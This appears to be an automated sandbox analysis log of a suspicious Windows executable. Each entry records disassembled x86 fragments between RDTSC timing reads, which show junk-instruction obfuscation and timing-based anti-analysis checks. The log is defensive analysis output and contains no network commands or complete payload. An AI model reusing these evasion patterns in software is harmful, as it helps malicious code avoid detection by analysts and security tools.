Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A16677 second address: A166A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A217h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F270C81A213h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A166A9 second address: A166B3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F270C8198C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DF45D second address: 9DF467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F270C81A206h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DF467 second address: 9BBE8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push esi 0x0000000c adc edi, 5FBE5FF7h 0x00000012 pop ecx 0x00000013 call dword ptr [ebp+122D2080h] 0x00000019 pushad 0x0000001a jmp 00007F270C8198CEh 0x0000001f jns 00007F270C8198CCh 0x00000025 js 00007F270C8198E1h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DF5FF second address: 9DF605 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DF7F5 second address: 9DF7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DF7F9 second address: 9DF7FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DF7FD second address: 9DF807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DF96A second address: 9DF96F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DF96F second address: 9DF9B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 586E99B4h 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F270C8198C8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 call 00007F270C8198C9h 0x0000002d pushad 0x0000002e push edi 0x0000002f pushad 0x00000030 popad 0x00000031 pop edi 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DF9B4 second address: 9DF9E2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F270C81A206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d jmp 00007F270C81A216h 0x00000012 pop ebx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pushad 0x0000001b popad 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DF9E2 second address: 9DF9E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DF9E7 second address: 9DFA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F270C81A20Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edi 0x0000000f jmp 00007F270C81A20Ah 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jng 00007F270C81A20Ch 0x00000021 jnp 00007F270C81A206h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DFB92 second address: 9DFBC4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F270C8198D0h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e mov dword ptr [ebp+122D22DFh], eax 0x00000014 nop 0x00000015 jmp 00007F270C8198CCh 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DFD7C second address: 9DFD80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DFD80 second address: 9DFD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DFD8A second address: 9DFD9A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F270C81A206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E028D second address: 9E0298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F270C8198C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E0624 second address: 9E0641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A213h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E071B second address: 9E0721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E0721 second address: 9E0781 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F270C81A208h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 lea eax, dword ptr [ebp+124961A8h] 0x0000002b mov edx, dword ptr [ebp+122D36FCh] 0x00000031 nop 0x00000032 push eax 0x00000033 pushad 0x00000034 je 00007F270C81A206h 0x0000003a jmp 00007F270C81A213h 0x0000003f popad 0x00000040 pop eax 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push esi 0x00000045 jng 00007F270C81A206h 0x0000004b pop esi 0x0000004c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E0781 second address: 9BCA22 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F270C8198C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F270C8198C8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 call dword ptr [ebp+1245C392h] 0x0000002d pushad 0x0000002e jmp 00007F270C8198CDh 0x00000033 push eax 0x00000034 push edx 0x00000035 je 00007F270C8198C6h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A15887 second address: A158BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F270C81A216h 0x00000009 popad 0x0000000a jmp 00007F270C81A216h 0x0000000f popad 0x00000010 push esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A158BD second address: A158C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F270C8198C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A159F4 second address: A159F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A159F8 second address: A15A04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A15A04 second address: A15A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A15A0A second address: A15A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A15A0E second address: A15A1A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F270C81A206h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A15A1A second address: A15A34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F270C8198C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A15BC2 second address: A15BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A15CE8 second address: A15D06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A15D06 second address: A15D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A15D0C second address: A15D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A15D12 second address: A15D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A15D17 second address: A15D26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F270C8198C6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A15D26 second address: A15D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A160C6 second address: A160CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A160CC second address: A160DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnp 00007F270C81A20Eh 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A1C275 second address: A1C27B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A1C27B second address: A1C27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A1C27F second address: A1C28E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F270C8198C6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A1C28E second address: A1C297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A1AF14 second address: A1AF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jne 00007F270C8198D2h 0x0000000b jno 00007F270C8198F2h 0x00000011 push edi 0x00000012 jo 00007F270C8198C6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A1B47F second address: A1B49A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F270C81A217h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A1B49A second address: A1B4A6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A1B4A6 second address: A1B4AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A1BA4C second address: A1BA66 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F270C8198D4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A1BC45 second address: A1BC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A1BC49 second address: A1BC54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A1BC54 second address: A1BC78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F270C81A219h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A1BC78 second address: A1BCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F270C8198C6h 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F270C8198D8h 0x00000013 jno 00007F270C8198C6h 0x00000019 jnl 00007F270C8198C6h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A22ED9 second address: A22EDF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A22EDF second address: A22EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A22EE5 second address: A22EEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A22EEA second address: A22F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F270C8198D2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A22F02 second address: A22F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F270C81A206h 0x0000000d jno 00007F270C81A206h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A22F15 second address: A22F19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A23058 second address: A23065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jno 00007F270C81A208h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A23065 second address: A23077 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F270C8198CBh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A23077 second address: A2307D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A263A1 second address: A263AA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A25C71 second address: A25C8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F270C81A20Ah 0x0000000a jnl 00007F270C81A206h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A25C8A second address: A25CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F270C8198CAh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A25CA0 second address: A25CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A25CA4 second address: A25CB3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F270C8198C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A25CB3 second address: A25CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A260AE second address: A260B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A2F2D8 second address: A2F2DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A2F2DD second address: A2F2EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F270C8198CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A2DD1E second address: A2DD2C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F270C81A20Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A2DE60 second address: A2DE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A2DE69 second address: A2DE6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A2E12A second address: A2E136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jne 00007F270C8198C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A2E136 second address: A2E15B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jbe 00007F270C81A206h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push esi 0x00000014 ja 00007F270C81A206h 0x0000001a pop esi 0x0000001b ja 00007F270C81A20Eh 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A2E2C2 second address: A2E2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E00D1 second address: 9E00D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E00D5 second address: 9E014E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F270C8198C8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 sub ecx, 3E3D396Bh 0x0000002d mov ebx, dword ptr [ebp+124961E7h] 0x00000033 mov dword ptr [ebp+122D23D4h], ebx 0x00000039 mov edx, 158B39C0h 0x0000003e add eax, ebx 0x00000040 mov dword ptr [ebp+1245B011h], ecx 0x00000046 jng 00007F270C8198D0h 0x0000004c pushad 0x0000004d mov ch, 66h 0x0000004f mov edx, dword ptr [ebp+122D2875h] 0x00000055 popad 0x00000056 nop 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F270C8198CBh 0x0000005e rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E014E second address: 9E016A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F270C81A210h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E016A second address: 9E016E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E016E second address: 9E01C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F270C81A208h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 call 00007F270C81A20Ah 0x00000027 jo 00007F270C81A20Ch 0x0000002d mov edi, dword ptr [ebp+122D2A2Dh] 0x00000033 pop edx 0x00000034 push 00000004h 0x00000036 mov ecx, dword ptr [ebp+122D3916h] 0x0000003c nop 0x0000003d jmp 00007F270C81A20Eh 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E01C7 second address: 9E01CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E01CB second address: 9E01DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A20Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
